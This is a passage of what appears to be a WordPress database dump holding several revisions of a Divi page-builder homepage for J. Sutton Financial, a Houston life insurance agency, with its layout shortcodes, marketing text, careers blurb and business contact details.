global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" parallax=\"on\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"24.8px\" custom_margin=\"||66px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-08 21:19:32','2023-04-08 21:19:32','',138,'http://cmdev-site1.com/?p=866',0,'revision','',0),(865,1,'2023-04-08 21:18:56','2023-04-08 21:18:56','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"700px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||30px|||\" hover_transition_speed_curve=\"ease-out\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu submenu_direction=\"downwards\" active_link_color=\"#FFFFFF\" dropdown_menu_bg_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_text_color=\"#000000\" mobile_menu_bg_color=\"#FFFFFF\" mobile_menu_text_color=\"#000000\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|phone\" mobile_menu_bg_color_tablet=\"#FFFFFF\" mobile_menu_bg_color_phone=\"#FFFFFF\" mobile_menu_bg_color_last_edited=\"on|phone\" logo_width_tablet=\"20%\" logo_width_phone=\"75%\" logo_width_last_edited=\"on|phone\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"221.9px\" custom_margin=\"-43px|||0px|false|false\" custom_margin_tablet=\"-43px|||0px|false|false\" custom_margin_phone=\"-10px||||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" dropdown_menu_bg_color__hover_enabled=\"on|desktop\" mobile_menu_text_color__hover_enabled=\"on|desktop\" dropdown_menu_bg_color__hover=\"#FFFFFF\" mobile_menu_text_color__hover=\"#000000\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" min_height=\"100px\" custom_margin=\"||-12px|||\" custom_padding=\"||0px||false|false\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|desktop\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_button button_url=\"/products-services/\" button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_border_width=\"0px\" button_border_radius=\"14px\" custom_margin=\"|||150px|false|false\" custom_margin_tablet=\"|||150px|false|false\" custom_margin_phone=\"|||0px|false|false\" custom_margin_last_edited=\"on|phone\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_button button_url=\"/careers/\" button_text=\"Work for Us\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_border_width=\"0px\" button_border_radius=\"14px\" custom_margin=\"|150px|||false|false\" custom_margin_tablet=\"|150px|||false|false\" custom_margin_phone=\"|0px|||false|false\" custom_margin_last_edited=\"on|desktop\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" title_text=\"Thumbs Up Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px|false|false\" custom_margin_tablet=\"|37px||89px|false|false\" custom_margin_phone=\"|0px||0px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" animation_duration=\"1250ms\" hover_enabled=\"0\" global_colors_info=\"{}\" custom_padding_last_edited=\"on|phone\" custom_padding_phone=\"0px|0px|||false|false\" sticky_enabled=\"0\" align=\"center\" width_last_edited=\"on|desktop\" module_alignment=\"right\" custom_padding_tablet=\"33px|1px||||\" width_tablet=\"70%\" width_phone=\"70%\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<h2><strong>Providing Premium Life Insurance Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-15px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" parallax=\"on\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"24.8px\" custom_margin=\"||66px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-08 21:18:56','2023-04-08 21:18:56','',138,'http://cmdev-site1.com/?p=865',0,'revision','',0),(869,1,'2023-04-08 21:20:41','2023-04-08 21:20:41','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"700px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||30px|||\" hover_transition_speed_curve=\"ease-out\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu submenu_direction=\"downwards\" active_link_color=\"#FFFFFF\" dropdown_menu_bg_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_text_color=\"#000000\" mobile_menu_bg_color=\"#FFFFFF\" mobile_menu_text_color=\"#000000\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|phone\" mobile_menu_bg_color_tablet=\"#FFFFFF\" mobile_menu_bg_color_phone=\"#FFFFFF\" mobile_menu_bg_color_last_edited=\"on|phone\" logo_width_tablet=\"20%\" logo_width_phone=\"75%\" logo_width_last_edited=\"on|phone\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"221.9px\" custom_margin=\"-43px|||0px|false|false\" custom_margin_tablet=\"-43px|||0px|false|false\" custom_margin_phone=\"-10px||||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" dropdown_menu_bg_color__hover_enabled=\"on|desktop\" mobile_menu_text_color__hover_enabled=\"on|desktop\" dropdown_menu_bg_color__hover=\"#FFFFFF\" mobile_menu_text_color__hover=\"#000000\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" min_height=\"100px\" custom_margin=\"||-12px|||\" custom_padding=\"||0px||false|false\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|desktop\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_button button_url=\"/products-services/\" button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_border_width=\"0px\" button_border_radius=\"14px\" custom_margin=\"|||150px|false|false\" custom_margin_tablet=\"|||150px|false|false\" custom_margin_phone=\"|||0px|false|false\" custom_margin_last_edited=\"on|phone\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_button button_url=\"/careers/\" button_text=\"Work for Us\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_border_width=\"0px\" button_border_radius=\"14px\" custom_margin=\"|150px|||false|false\" custom_margin_tablet=\"|150px|||false|false\" custom_margin_phone=\"|0px|||false|false\" custom_margin_last_edited=\"on|desktop\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" title_text=\"Thumbs Up Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"||||false|false\" custom_margin_tablet=\"|37px||89px|false|false\" custom_margin_phone=\"|0px||0px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" animation_duration=\"1250ms\" hover_enabled=\"0\" global_colors_info=\"{}\" custom_padding_last_edited=\"on|phone\" custom_padding_phone=\"0px|0px|||false|false\" sticky_enabled=\"0\" width_last_edited=\"on|desktop\" module_alignment=\"right\" align=\"center\" always_center_on_mobile=\"off\" module_alignment_last_edited=\"on|desktop\" module_alignment_phone=\"center\" module_alignment_tablet=\"center\" custom_padding_tablet=\"33px|1px||||\" width_tablet=\"70%\" width_phone=\"70%\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<h2><strong>Providing Premium Life Insurance Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-15px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" 